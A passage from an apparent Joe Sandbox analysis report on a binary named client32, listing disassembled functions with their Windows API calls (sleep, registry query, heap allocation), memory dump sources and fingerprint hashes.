                                                                                                                  • Sleep.KERNEL32(00000064), ref: 6BEC6C5B
                                                                                                                    • Part of subcall function 6BEC6940: GetTickCount.KERNEL32 ref: 6BEC6950
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountTick$Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4250438611-0
                                                                                                                  • Opcode ID: 2437e30424e81f1ed4aae845ffaf1c91c88272ef5c7b51ba0732c5bd84e40f17
                                                                                                                  • Instruction ID: 52d36153847bb22cfa2b21dececf3ae6aac8a3ba6aad75b7facec0d8195427e7
                                                                                                                  • Opcode Fuzzy Hash: 2437e30424e81f1ed4aae845ffaf1c91c88272ef5c7b51ba0732c5bd84e40f17
                                                                                                                  • Instruction Fuzzy Hash: CCF05E31A04104CECF14DF74E65573AB3A9EBE2319F3101AAC42397681C77CD894D702
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB63A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WSACancelBlockingCall.WSOCK32 ref: 6BEB63A9
                                                                                                                  • Sleep.KERNEL32(00000032), ref: 6BEB63B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockingCallCancelSleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3706969569-0
                                                                                                                  • Opcode ID: bace8d67761baa7341be8e8b3f8b356abdd4fb3fc0f207e3460450c0b412c55c
                                                                                                                  • Instruction ID: 6107e1c9aaeffa98bf839ca13614624d6b671950b557adaba674b04895153e80
                                                                                                                  • Opcode Fuzzy Hash: bace8d67761baa7341be8e8b3f8b356abdd4fb3fc0f207e3460450c0b412c55c
                                                                                                                  • Instruction Fuzzy Hash: ACB092713911204DAB0017B14A0731A61880FC424BF7408A8AA42C8086EF78C100E022
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 11141240 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 11141160: ExpandEnvironmentStringsA.KERNEL32(\yMu,?,00000104,754D795C), ref: 11141187
                                                                                                                    • Part of subcall function 1116067B: __fsopen.LIBCMT ref: 11160688
                                                                                                                  • GetLastError.KERNEL32(?,00000000,754D795C,00000000), ref: 11141275
                                                                                                                  • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,754D795C,00000000), ref: 11141285
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3768737497-0
                                                                                                                  • Opcode ID: 095fbb323597ed630c2ce92ee5dc822cb6d747f27c5a336ad123bdd945b58385
                                                                                                                  • Instruction ID: 103134ba4653f8fc15402f07188d85fc6b934bc741d6c344a8ba55e5f3ec2e88
                                                                                                                  • Opcode Fuzzy Hash: 095fbb323597ed630c2ce92ee5dc822cb6d747f27c5a336ad123bdd945b58385
                                                                                                                  • Instruction Fuzzy Hash: 1A11E5B6A00215ABDB119F94C9C0E6FF378EB45A69F304165ED04D7200E775BD0287A3
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 1113F3A0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110C55B,754D8400,?,?,111414FF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F3C0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3660427363-0
                                                                                                                  • Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                  • Instruction ID: 5fbfdb2e62506a22be8d6102f6026bab3dbcb22e3eaadfb442edbe5e81d15758
                                                                                                                  • Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                  • Instruction Fuzzy Hash: C711B4717242475BE7118D14E590AAEFB6AEFC523EF20812AE59647908C2319443C763
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEDA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,6BED6F16,00000000,?,6BEDD40B,00000001,6BED6F16,00000000,00000000,00000000,?,6BED6F16,00000001,00000214), ref: 6BEDA0C5
                                                                                                                    • Part of subcall function 6BED60F9: __getptd_noexit.LIBCMT ref: 6BED60F9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 328603210-0
                                                                                                                  • Opcode ID: caad4b034499e56de0ac907be45151279203dc6b15cf1bba5dcfb2a729a0db43
                                                                                                                  • Instruction ID: 09709db7704eb0dc68934b6edca5eb035cb87476616d20ce7b3c5eeba2484bf0
                                                                                                                  • Opcode Fuzzy Hash: caad4b034499e56de0ac907be45151279203dc6b15cf1bba5dcfb2a729a0db43
                                                                                                                  • Instruction Fuzzy Hash: 9C01F1313812169EEB148E24DC10B573758AF81368F2099A9EA168B2C0DBFDD5128640
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%